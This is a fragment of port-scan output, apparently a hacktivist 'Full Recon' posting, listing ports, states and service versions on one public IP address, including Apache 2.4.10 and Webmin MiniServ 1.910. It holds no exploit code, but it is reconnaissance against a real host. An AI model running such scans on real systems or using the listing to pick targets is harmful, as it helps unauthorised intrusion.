19252185.82.200.52 138 udp netbios-dgm filtered
19253185.82.200.52 139 udp netbios-ssn closed
19254185.82.200.52 161 udp snmp closed
19255185.82.200.52 162 udp snmptrap closed
19256185.82.200.52 389 udp ldap closed
19257185.82.200.52 443 tcp ssl/http open Apache httpd 2.4.10 (Debian)
19258185.82.200.52 500 udp isakmp closed
19259185.82.200.52 520 udp route closed
19260185.82.200.52 2049 udp nfs closed
19261185.82.200.52 10000 tcp http open MiniServ 1.910 Webmin httpd
19262#######################################################################################################################################
19263 Anonymous JTSEC HunterUnit Full Recon #1